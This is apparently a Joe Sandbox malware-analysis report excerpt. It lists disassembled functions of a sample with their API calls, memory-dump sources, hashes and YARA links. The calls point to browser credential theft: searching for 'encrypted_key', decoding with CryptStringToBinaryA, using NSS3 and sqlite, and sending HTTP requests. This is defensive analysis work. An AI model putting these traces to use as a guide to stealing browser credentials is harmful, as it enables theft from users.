                                                                                            • Part of subcall function 00418830: GetFileAttributesA.KERNEL32(00000000,?,0040FF57,?,00000000,?,00000000,00420D97,00420D96), ref: 0041883F
                                                                                            • Part of subcall function 00409D30: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D89
                                                                                            • Part of subcall function 00409D30: memcmp.MSVCRT ref: 00409DE2
                                                                                            • Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
                                                                                            • Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
                                                                                            • Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
                                                                                            • Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
                                                                                            • Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
                                                                                            • Part of subcall function 00409A10: CloseHandle.KERNEL32(000000FF), ref: 00409AEA
                                                                                            • Part of subcall function 00418E60: GlobalAlloc.KERNEL32(00000000,00413EED,00413EED), ref: 00418E73
                                                                                          • StrStrA.SHLWAPI(?,0081A868), ref: 00413F03
                                                                                          • GlobalFree.KERNEL32(?), ref: 00413FFF
                                                                                            • Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B3F
                                                                                            • Part of subcall function 00409B10: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 00409B51
                                                                                            • Part of subcall function 00409B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 00409B7A
                                                                                            • Part of subcall function 00409B10: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 00409B8F
                                                                                            • Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
                                                                                            • Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
                                                                                            • Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 00413F90
                                                                                          • StrCmpCA.SHLWAPI(?,0042089B,?,?,?,?,000003E8), ref: 00413FAD
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413FBF
                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 00413FD2
                                                                                          • lstrcat.KERNEL32(00000000,00420F88), ref: 00413FE1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                          • String ID:
                                                                                          • API String ID: 1812951797-0
                                                                                          • Opcode ID: 35d23c3385c7155335e2918f686357b083509c71e6c860d68a484b91e107388c
                                                                                          • Instruction ID: d4b1db0ab37bfb67570dd3d18e95715430c5246f155b9e5a4f3dc5da96f51bca
                                                                                          • Opcode Fuzzy Hash: 35d23c3385c7155335e2918f686357b083509c71e6c860d68a484b91e107388c
                                                                                          • Instruction Fuzzy Hash: 0D716672900218ABCB14EBA1DC49FDE7779AF48304F00859DF605A7191EA789B85CFA5
                                                                                          Function 6CB94E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetErrorText.NSS3(00000000,00000000,?,6CB578F8), ref: 6CB94E6D
                                                                                            • Part of subcall function 6CB309E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CB306A2,00000000,?), ref: 6CB309F8
                                                                                            • Part of subcall function 6CB309E0: malloc.MOZGLUE(0000001F), ref: 6CB30A18
                                                                                            • Part of subcall function 6CB309E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CB30A33
                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CB578F8), ref: 6CB94ED9
                                                                                            • Part of subcall function 6CB85920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CB87703,?,00000000,00000000), ref: 6CB85942
                                                                                            • Part of subcall function 6CB85920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CB87703), ref: 6CB85954
                                                                                            • Part of subcall function 6CB85920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CB8596A
                                                                                            • Part of subcall function 6CB85920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CB85984
                                                                                            • Part of subcall function 6CB85920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CB85999
                                                                                            • Part of subcall function 6CB85920: free.MOZGLUE(00000000), ref: 6CB859BA
                                                                                            • Part of subcall function 6CB85920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CB859D3
                                                                                            • Part of subcall function 6CB85920: free.MOZGLUE(00000000), ref: 6CB859F5
                                                                                            • Part of subcall function 6CB85920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CB85A0A
                                                                                            • Part of subcall function 6CB85920: free.MOZGLUE(00000000), ref: 6CB85A2E
                                                                                            • Part of subcall function 6CB85920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CB85A43
                                                                                          • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB94EB3
                                                                                            • Part of subcall function 6CB94820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CB94EB8,?,?,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB9484C
                                                                                            • Part of subcall function 6CB94820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CB94EB8,?,?,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB9486D
                                                                                            • Part of subcall function 6CB94820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CB94EB8,?), ref: 6CB94884
                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB94EC0
                                                                                            • Part of subcall function 6CB94470: TlsGetValue.KERNEL32(00000000,?,6CB57296,00000000), ref: 6CB94487
                                                                                            • Part of subcall function 6CB94470: EnterCriticalSection.KERNEL32(?,?,?,6CB57296,00000000), ref: 6CB944A0
                                                                                            • Part of subcall function 6CB94470: PR_Unlock.NSS3(?,?,?,?,6CB57296,00000000), ref: 6CB944BB
                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB94F16
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB94F2E
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB94F40
                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB94F6C
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB94F80
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB94F8F
                                                                                          • PK11_UpdateSlotAttribute.NSS3(?,6CC6DCB0,00000000), ref: 6CB94FFE
                                                                                          • PK11_UserDisableSlot.NSS3(0000001E), ref: 6CB9501F
                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CB578F8), ref: 6CB9506B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 560490210-0
                                                                                          • Opcode ID: 9f3c52cd8287b7a150d5782c29cd55d3289a13c88453100a0cd9e617cd89fdb1
                                                                                          • Instruction ID: 655860369b625d12609ca5adcdd61d5d665020adb0fabd062e54e3ebf3375274
                                                                                          • Opcode Fuzzy Hash: 9f3c52cd8287b7a150d5782c29cd55d3289a13c88453100a0cd9e617cd89fdb1
                                                                                          • Instruction Fuzzy Hash: 9751F4B1D002869FEB019F64EC05A9F3AB8FF0635DF180635EC1A97A12F731D5188A92
                                                                                          Function 6CB3ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                          • String ID:
                                                                                          • API String ID: 786543732-0
                                                                                          • Opcode ID: 8cc1dee3b62457967fb2d7d465f635bd1a70f295546864b336b5d699570ff57e
                                                                                          • Instruction ID: 6f80f0c2589d9aa0fa5cbd59af321e1626a55738778c3bdf5368e7dfd18bd618
                                                                                          • Opcode Fuzzy Hash: 8cc1dee3b62457967fb2d7d465f635bd1a70f295546864b336b5d699570ff57e
                                                                                          • Instruction Fuzzy Hash: 50519CB4E00276CBDF01DFE8E8456AEB7B4EB06349F240125D808A3A60E731E955CFD6
                                                                                          Function 00414DA0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                            • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,0081C7C8), ref: 00406353
                                                                                            • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                            • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,0081BC80,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                            • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                            • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DF8
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00414E0F
                                                                                            • Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2
                                                                                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00414E44
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00414E63
                                                                                          • strtok.MSVCRT ref: 00414E7E
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00414E8E
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                          • API String ID: 3532888709-1526165396
                                                                                          • Opcode ID: 6162ca369d7659fc23bb1040c6d0a5dfda67ed9c2bc42a9310e26393c24bdf9f
                                                                                          • Instruction ID: 8f24e6183c5aafacdfff780c7fa5c74c912095ee1ff337cf81358bf1c292c6a0
                                                                                          • Opcode Fuzzy Hash: 6162ca369d7659fc23bb1040c6d0a5dfda67ed9c2bc42a9310e26393c24bdf9f
                                                                                          • Instruction Fuzzy Hash: D5516130911108ABCB14FF61CC9AEED7738AF50358F50401EF80B665A2DF786B95CB6A
                                                                                          Function 6CB7ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CB7ADE6
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB7AE17
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB7AE29
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB7AE3F
                                                                                          • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CB7AE78
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB7AE8A
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB7AEA0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_strncpyzPrint$L_strcatn
                                                                                          • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                                          • API String ID: 332880674-605059067
                                                                                          • Opcode ID: b1f3f955c925b9d7721beae48d40551165e53749ffa4c2237b0974657ad67175
                                                                                          • Instruction ID: 185412b399a7f8e015e1b762bfbe8e65ee16404408a3db7a15e7c9968ff33927
                                                                                          • Opcode Fuzzy Hash: b1f3f955c925b9d7721beae48d40551165e53749ffa4c2237b0974657ad67175
                                                                                          • Instruction Fuzzy Hash: AC31D372600294ABCB109B65ED9CBAF3775EB4630DF444424F91DABA01EB30D859CFA2
                                                                                          Function 6CC14C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6CC14CAF
                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC14CFD
                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6CC14D44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_value_text16$sqlite3_log
                                                                                          • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                          • API String ID: 2274617401-4033235608
                                                                                          • Opcode ID: 9a72e86c2565dc5d20ff5e8b84e4b5ee5ef91cab5919a90b917a5037e7df3d76
                                                                                          • Instruction ID: 5220a3ad3579eb83ae30e0298e0683396f9a3aa305f0ac222b16782c4d18fe78
                                                                                          • Opcode Fuzzy Hash: 9a72e86c2565dc5d20ff5e8b84e4b5ee5ef91cab5919a90b917a5037e7df3d76
                                                                                          • Instruction Fuzzy Hash: F9317CB3E0C851A7DB08DB27D8217A57332B78235CF150165D4244BF54FB61EC22A7E2
                                                                                          Function 6CB72DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_InitPIN), ref: 6CB72DF6
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB72E24
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB72E33
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB72E49
                                                                                          • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB72E68
                                                                                          • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB72E81
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                          • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                                          • API String ID: 1003633598-1777813432
                                                                                          • Opcode ID: d82c75a16de3789ce1c3a28093f303290370b212b2b31c83538077e5810bbba0
                                                                                          • Instruction ID: 530d64e4e0ab679c953dd91725623520900a5d43887de085c8a07418cc12909e
                                                                                          • Opcode Fuzzy Hash: d82c75a16de3789ce1c3a28093f303290370b212b2b31c83538077e5810bbba0
                                                                                          • Instruction Fuzzy Hash: 64310471A011A4EBDB108B56ED9CB8E3775EB4231DF444024ED1DA7A11EB309959CBA2
                                                                                          Function 6CB76EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CB76F16
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB76F44
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB76F53
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB76F69
                                                                                          • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CB76F88
                                                                                          • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CB76FA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                          • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
                                                                                          • API String ID: 1003633598-226530419
                                                                                          • Opcode ID: 7f2c0b3dc93ec3357b59efc81eea65161ff7187eafc536d11b4b404014ce83eb
                                                                                          • Instruction ID: 9eca89235c44da0262303a2d5ca4c076264b5bc34bb47ece7e7e1b9fb0056031
                                                                                          • Opcode Fuzzy Hash: 7f2c0b3dc93ec3357b59efc81eea65161ff7187eafc536d11b4b404014ce83eb
                                                                                          • Instruction Fuzzy Hash: D231D0756011A0ABDF108B65ED9CB8E37B5EB42319F484024EC1DEBA11EB30DC59CBA2
                                                                                          Function 6CC12D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • sqlite3_initialize.NSS3 ref: 6CC12D9F
                                                                                            • Part of subcall function 6CACCA30: EnterCriticalSection.KERNEL32(?,?,?,6CB2F9C9,?,6CB2F4DA,6CB2F9C9,?,?,6CAF369A), ref: 6CACCA7A
                                                                                            • Part of subcall function 6CACCA30: LeaveCriticalSection.KERNEL32(?), ref: 6CACCB26
                                                                                          • sqlite3_exec.NSS3(?,?,6CC12F70,?,?), ref: 6CC12DF9
                                                                                          • sqlite3_free.NSS3(00000000), ref: 6CC12E2C
                                                                                          • sqlite3_free.NSS3(?), ref: 6CC12E3A
                                                                                          • sqlite3_free.NSS3(?), ref: 6CC12E52
                                                                                          • sqlite3_mprintf.NSS3(6CC7AAF9,?), ref: 6CC12E62
                                                                                          • sqlite3_free.NSS3(?), ref: 6CC12E70
                                                                                          • sqlite3_free.NSS3(?), ref: 6CC12E89
                                                                                          • sqlite3_free.NSS3(?), ref: 6CC12EBB
                                                                                          • sqlite3_free.NSS3(?), ref: 6CC12ECB
                                                                                          • sqlite3_free.NSS3(00000000), ref: 6CC12F3E
                                                                                          • sqlite3_free.NSS3(?), ref: 6CC12F4C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
